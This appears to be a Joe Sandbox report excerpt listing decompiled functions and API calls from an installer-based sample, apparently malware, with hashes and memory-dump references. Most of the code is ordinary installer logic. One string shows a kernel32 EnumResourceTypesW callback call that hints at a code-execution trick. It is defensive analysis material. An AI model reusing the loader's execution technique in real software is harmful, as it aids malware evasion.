Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
Instruction ID: 5f111b40a0b3629fd10373ff15fdd2cb33e52a8e4a636b5fd16f787c111e88a9
Opcode Fuzzy Hash: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
Instruction Fuzzy Hash: 5FE08C32141118BBCF215E519C00AE73B5CEB003A2F00C032BA08E6290D630EA599BAA

Uniqueness

Uniqueness Score: -1.00%

Function 100026C2 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004058 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x10004050 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}

0x100026cb
0x100026d0
0x100026e0
0x100026e8
0x100026ef
0x100026f4
0x100026f9
0x100026fe
0x10002703
0x10002708
0x1000270d
0x1000270d
0x10002715

APIs

VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 100026E0

Memory Dump Source

Source File: 00000000.00000002.2999566321.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2999506923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999612936.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999647911.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_SC.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: 50d40a96d24def304b4b26cf20c6df658c6444d5d293e09e435d7040471c3010
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: 2BF09BF19092A0DEF360DF688CC47063FE4E7983D5B03852AE358F6269EB3445448B19

Uniqueness

Uniqueness Score: -1.00%

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401595() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402A07(0xfffffff0),  *(_t11 - 0x20)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015a0
0x004015a6
0x004015a8
0x0040266d
0x0040266d
0x0040289f
0x004028ab

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4d472c43639dc04def5d2b840e89fb0869f99a80fec98c3c568aaf3f843f624b
Instruction ID: 491e9dad881d306943984f2b5cfdc1394ca5d0b553b86ee0e5f4f48b65607393
Opcode Fuzzy Hash: 4d472c43639dc04def5d2b840e89fb0869f99a80fec98c3c568aaf3f843f624b
Instruction Fuzzy Hash: 28D01233B081109BDB10DBE99E4899D77A09B04324F248637D111F11D1D6B99541561D

Uniqueness

Uniqueness Score: -1.00%

Function 004030C0 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030C0(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
				return _t2;
			}

0x004030ce
0x004030d4

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFA,00008BE4), ref: 004030CE

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00403EDD Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403EDD(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x42eba8, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00403eeb
0x00403ef1

APIs

SendMessageA.USER32(00000028,?,00000001,00403D0E), ref: 00403EEB

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 82644edcf3efe4120ad3297303d077226593b8c1deeca385b8ec1e4b65c8b5e6
Instruction ID: f46d431e8e7408228874a808ffc2914bf6276662b6e951ab0ea6f6a7c2946d50
Opcode Fuzzy Hash: 82644edcf3efe4120ad3297303d077226593b8c1deeca385b8ec1e4b65c8b5e6
Instruction Fuzzy Hash: D3B01235685200BFFE328B00DD0DF457E62F764701F008034B301240F0C6B210A1EB59

Uniqueness

Uniqueness Score: -1.00%

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D6() {
				long _t2;
				void* _t6;
				void* _t10;

				_t2 = E004029EA(_t6);
				if(_t2 <= 1) {
					_t2 = 1;
				}
				Sleep(_t2); // executed
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t10 - 4));
				return 0;
			}

0x004014d7
0x004014df
0x004014e3
0x004014e3
0x004014e5
0x0040289f
0x004028ab

APIs

Sleep.KERNELBASE(00000000), ref: 004014E5

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0603eb80091a95b1f602976c8f6e7bfccfb3fb5df01df8ae88225197d1fd4128
Instruction ID: acaa6b3476ad5fafda8d7447acda5005b584cdaf565da1723a927038707b88e4
Opcode Fuzzy Hash: 0603eb80091a95b1f602976c8f6e7bfccfb3fb5df01df8ae88225197d1fd4128
Instruction Fuzzy Hash: 06D0C977B141008BD750E7B9AE8995A73A8FB413293244C33E502E11A2D579D812861D

Uniqueness

Uniqueness Score: -1.00%

Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x1000405c); // executed
				return _t1;
			}

0x1000121d
0x10001223

APIs

GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,00000001), ref: 1000121D

Memory Dump Source

Source File: 00000000.00000002.2999566321.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2999506923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999612936.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999647911.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_SC.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404FE3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 279
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404FE3(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				char* _t164;
				char* _t165;

				_t154 =  *0x42e384; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F77, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x42a020;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xd;
									_t165 = _t164 + 1;
									 *_t165 = 0xa;
									_t163 = _t165 + 1;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e36c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42eba8, 8);
							__eflags =  *0x42ec2c - _t149; // 0x0
							if(__eflags == 0) {
								E00404EA5( *((intOrPtr*)( *0x4297f8 + 0x34)), _t149);
							}
							E00403E81(1);
							goto L25;
						}
						 *0x4293f0 = 2;
						E00403E81(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403F0F(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e370, _t149);
						ShowWindow(_t154, 8);
						E00403EDD(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ebb0; // 0x651b28
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e370 = GetDlgItem(_a4, 0x403);
				 *0x42e368 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e384 = _t127;
				_v8 = _t127;
				E00403EDD( *0x42e370);
				 *0x42e374 = E00404743(4);
				 *0x42e38c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403EA8(_a4);
				if(( *0x42ebb8 & 0x00000003) != 0) {
					ShowWindow( *0x42e370, _t149);
					if(( *0x42ebb8 & 0x00000002) != 0) {
						 *0x42e370 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EDD( *0x42e368);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ebb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404fec
0x00404ff2
0x00404ffb
0x00404ffe
0x0040518f
0x00405196
0x004051ba
0x004051ba
0x004051c0
0x004051cd
0x004051eb
0x004051eb
0x004051f2
0x00405249
0x00405249
0x0040524d
0x00000000
0x00000000
0x0040524f
0x00405252
0x00000000
0x00000000
0x0040525c
0x00405262
0x00405264
0x00405267
0x00405361
0x00000000
0x00405361
0x00405276
0x00405282
0x00405288
0x0040528b
0x0040528e
0x004052a3
0x004052a6
0x004052a6
0x004052a9
0x00405290
0x00405295
0x0040529b
0x0040529e
0x0040529e
0x004052b9
0x004052c1
0x004052c2
0x004052c4
0x004052cd
0x004052d0
0x004052d7
0x004052de
0x004052e6
0x004052e6
0x004052f4
0x004052fa
0x004052fd
0x004052fd
0x00405304
0x0040530a
0x00405313
0x0040531a
0x00405323
0x00405325
0x00405328
0x00405337
0x00405339
0x0040533c
0x0040533d
0x00405340
0x00405341
0x00405342
0x00405342
0x0040534a
0x00405355
0x0040535b
0x0040535b
0x00000000
0x004052c4
0x004051f4
0x004051fa
0x0040522a
0x0040522c
0x00405232
0x0040523d
0x0040523d
0x00405244
0x00000000
0x00405244
0x004051fe
0x00405208
0x00000000
0x004051cf
0x004051cf
0x004051d5
0x0040520d
0x00000000
0x00405216
0x004051de
0x004051e3
0x004051e6
0x00000000
0x004051e6
0x004051cd
0x00405004
0x00405008
0x00405011
0x00405018
0x0040501b
0x0040501e
0x00405021
0x00405022
0x00405023
0x0040503c
0x0040503f
0x00405049
0x00405058
0x00405060
0x00405068
0x0040506d
0x00405070
0x0040507c
0x00405085
0x0040508e
0x004050b1
0x004050b7
0x004050c8
0x004050cd
0x004050db
0x004050e9
0x004050e9
0x004050ee
0x004050fc
0x004050fc
0x00405101
0x00405104
0x00405109
0x00405115
0x0040511e
0x0040512b
0x0040513a
0x0040512d
0x00405132
0x00405132
0x00405146
0x00405146
0x0040515a
0x00405163
0x0040516c
0x0040517c
0x00405188
0x00405188
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405042
GetDlgItem.USER32(?,000003EE), ref: 00405051
GetClientRect.USER32(?,?), ref: 0040508E
GetSystemMetrics.USER32(00000015), ref: 00405096
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050B7
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050C8
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050DB
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050E9
SendMessageA.USER32(?,00001024,00000000,?), ref: 004050FC
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040511E
ShowWindow.USER32(?,00000008), ref: 00405132
GetDlgItem.USER32(?,000003EC), ref: 00405153
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405163
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040517C
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405188
GetDlgItem.USER32(?,000003F8), ref: 00405060

Part of subcall function 00403EDD: SendMessageA.USER32(00000028,?,00000001,00403D0E), ref: 00403EEB

GetDlgItem.USER32(?,000003EC), ref: 004051A5
CreateThread.KERNEL32(00000000,00000000,Function_00004F77,00000000), ref: 004051B3
CloseHandle.KERNEL32(00000000), ref: 004051BA
ShowWindow.USER32(00000000), ref: 004051DE
ShowWindow.USER32(00000000,00000008), ref: 004051E3
ShowWindow.USER32(00000008), ref: 0040522A
SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040525C
CreatePopupMenu.USER32 ref: 0040526D
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405282
GetWindowRect.USER32(00000000,?), ref: 00405295
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052B9
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052F4
OpenClipboard.USER32(00000000), ref: 00405304
EmptyClipboard.USER32 ref: 0040530A
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405313
GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040531D
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405331
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040534A
SetClipboardData.USER32(00000001,00000000), ref: 00405355
CloseClipboard.USER32 ref: 0040535B

Strings

{, xrefs: 00405249

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: deddfd4e36412dec96aa055fb552b981f44ea6835fd62dd796566a0b1e2ef51b
Instruction ID: a21e6249ac8bc888c709a424ccf7157ce7a7130d11ef99fd9928d349982f1b83
Opcode Fuzzy Hash: deddfd4e36412dec96aa055fb552b981f44ea6835fd62dd796566a0b1e2ef51b
Instruction Fuzzy Hash: A1A13A70900208FFEB219F61DC89AAE7F79FB04355F10817AFA05AA1A0C7755A41DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004042E6 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004042E6(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				struct HWND__* _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t78;
				long _t83;
				signed char* _t85;
				void* _t91;
				signed int _t92;
				signed char _t110;
				signed int _t114;
				struct HWND__** _t118;
				intOrPtr _t120;
				intOrPtr* _t134;
				CHAR* _t142;
				intOrPtr _t144;
				signed char _t145;
				signed int _t146;
				signed int _t150;
				signed int* _t152;
				signed int _t153;
				signed char* _t154;
				struct HWND__* _t159;
				struct HWND__* _t160;
				int _t162;

				_t78 =  *0x4297f8;
				_v36 = _t78;
				_t142 = ( *(_t78 + 0x3c) << 0xa) + "kernel32::EnumResourceTypesW(i 0,i r1,i 0)";
				_v12 =  *((intOrPtr*)(_t78 + 0x38));
				if(_a8 == 0x40b) {
					E004053AD(0x3fb, _t142);
					E00405E03(_t142);
				}
				_t160 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004053AD(0x3fb, _t142);
							if(E00405733(_t179, _t142) == 0) {
								_v8 = 1;
							}
							E00405B98(0x428ff0, _t142);
							_t152 = 0;
							_t83 = E00405EC3(0);
							_v16 = _t83;
							if(_t83 == 0 || 0 == 0x428ff0) {
								L30:
								E00405B98(0x428ff0, _t142);
								_t85 = E004056DE(0x428ff0);
								if(_t85 != 0) {
									 *_t85 =  *_t85 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428ff0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L36;
								} else {
									_t162 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L37;
								}
							} else {
								while(1) {
									_t110 = _v16(0x428ff0,  &_v44,  &_v32,  &_v24);
									if(_t110 != 0) {
										break;
									}
									if(_t152 != 0) {
										 *_t152 =  *_t152 & _t110;
									}
									_t154 = E0040568C(0x428ff0);
									 *_t154 =  *_t154 & 0x00000000;
									_t152 = _t154 - 1;
									 *_t152 = 0x5c;
									if(_t152 != 0x428ff0) {
										continue;
									} else {
										goto L30;
									}
								}
								_v16 = 0xa;
								_t145 = _v16;
								_t150 = _v40;
								_v40 = _t150 >> _t145;
								_t153 = (_t150 << 0x00000020 | _v44) >> _t145;
								_v12 = 1;
								L36:
								_t162 = 0x400;
								L37:
								_t91 = E00404743(5);
								if(_v12 != 0 && _t153 < _t91) {
									_v8 = 2;
								}
								_t144 =  *0x42e37c; // 0x6541a7
								if( *((intOrPtr*)(_t144 + 0x10)) != 0) {
									E0040468E(0x3ff, 0xfffffffb, _t91);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, _t162, 0x428fe0);
									} else {
										E0040468E(_t162, 0xfffffffc, _t153);
									}
								}
								_t92 = _v8;
								 *0x42ec44 = _t92;
								if(_t92 == 0) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t162) != 0) {
									_v8 = 0;
								}
								E00403ECA(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x42a010 == 0) {
									E0040427B();
								}
								 *0x42a010 = 0;
								goto L52;
							}
						}
						_t179 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L52;
						}
						goto L22;
					}
					_t114 = _a12 & 0x0000ffff;
					if(_t114 != 0x3fb) {
						L12:
						if(_t114 == 0x3e9) {
							_t146 = 7;
							memset( &_v72, 0, _t146 << 2);
							_v76 = _t160;
							_v68 = 0x42a020;
							_v56 = E00404628;
							_v52 = _t142;
							_v64 = E00405BBA(_t142, 0x42a020, _t160, 0x4293f8, _v12);
							_t118 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t118);
							if(_t118 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t118);
								E00405645(_t142);
								_t120 =  *0x42ebb0; // 0x651b28
								_t121 =  *((intOrPtr*)(_t120 + 0x11c));
								if( *((intOrPtr*)(_t120 + 0x11c)) != 0 && _t142 == "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter") {
									E00405BBA(_t142, 0x42a020, _t160, 0, _t121);
									if(lstrcmpiA(0x42db40, 0x42a020) != 0) {
										lstrcatA(_t142, 0x42db40);
									}
								}
								 *0x42a010 =  *0x42a010 + 1;
								SetDlgItemTextA(_t160, 0x3fb, _t142);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L52;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = GetDlgItem(_t160, 0x3fb);
					if(E004056B2(_t142) != 0 && E004056DE(_t142) == 0) {
						E00405645(_t142);
					}
					 *0x42e378 = _t160;
					SetWindowTextA(_t159, _t142);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403EA8(_t160);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403EA8(_t160);
					E00403EDD(_t159);
					_t134 = E00405EC3(7);
					if(_t134 == 0) {
						L52:
						return E00403F0F(_a8, _a12, _a16);
					}
					 *_t134(_t159, 1);
					goto L8;
				}
			}

0x004042ec
0x004042f2
0x004042ff
0x0040430d
0x00404310
0x00404318
0x0040431e
0x0040431e
0x0040432a
0x0040432d
0x0040439b
0x004043a2
0x00404479
0x00404480
0x0040448f
0x0040448f
